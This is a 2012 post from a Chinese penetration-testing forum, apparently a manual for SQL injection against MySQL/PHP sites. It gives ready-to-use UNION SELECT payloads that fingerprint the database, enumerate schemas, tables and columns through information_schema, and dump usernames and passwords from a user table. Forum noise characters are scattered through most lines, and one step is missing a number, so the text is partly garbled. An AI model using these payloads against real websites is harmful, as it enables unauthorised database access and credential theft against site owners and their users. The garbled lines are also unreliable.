中国网络渗透测试联盟

标题: mysql盲注手册 [打印本页]
作者: admin    时间: 2012-9-13 16:27
标题: mysql盲注手册
# ^) q3 G$ Z! |* r; e
教程内容:Mysql 5+php 注入' p6 ^! U) a# d
  J6 f7 J! a* Q

! }$ E- i% T9 K: @, d& D: A2 K7 l8 _9 D6 P# Y3 Y$ N# S) f4 ?& {
一.查看MYSQL基本信息(库名,版本,用户)3 k" p( X0 i7 I0 ~

% t! r8 \8 c, k4 j& Z4 X0 e6 xand 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*$ u) d/ h. O9 {; A( l
( o- D# T" g! O5 U1 F0 Q
二.查数据库8 X# y! v( c! F' _) R
. t4 u: l' z+ k  ~7 y3 ?9 |
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8  from information_schema.SCHEMATA limit 1,1/*- T' e' l+ l# p8 }8 I+ |
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。* q/ r9 Y, X, s8 }1 M
0 S; _% X* t: S4 K6 S$ a
三.暴表/ g7 f+ R+ R6 c& Q7 G/ p3 N

6 R3 ~7 S. ]) b& eand 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*3 @' q( H# `1 A- L7 H* \3 S
# G. Q7 b7 i2 H# i2 X
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。
( W5 l; m7 }* x, x/ J
, P+ y- U3 N0 \% e) s四.暴字段
. k, E$ D) V  @9 C2 D6 Z0 c7 s1 |
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*( Y& v/ M; v$ c+ U" u* q
2 v* [7 G! j; k
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。
1 a2 F6 {" x7 J8 d, V" W5 E( d7 l6 {) P( |0 h
五.暴数据
& f# {8 l7 t: F; ]' B# Q! [
3 Y. ?. S; A, S9 Xand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
* i! s& k# F  ~  e% @5 d+ T8 r$ {1 F, i
8 w/ o% {0 ]8 {, Z" U" i& T
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
8 D1 F+ X( u8 o# j- V) Q, l4 [



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2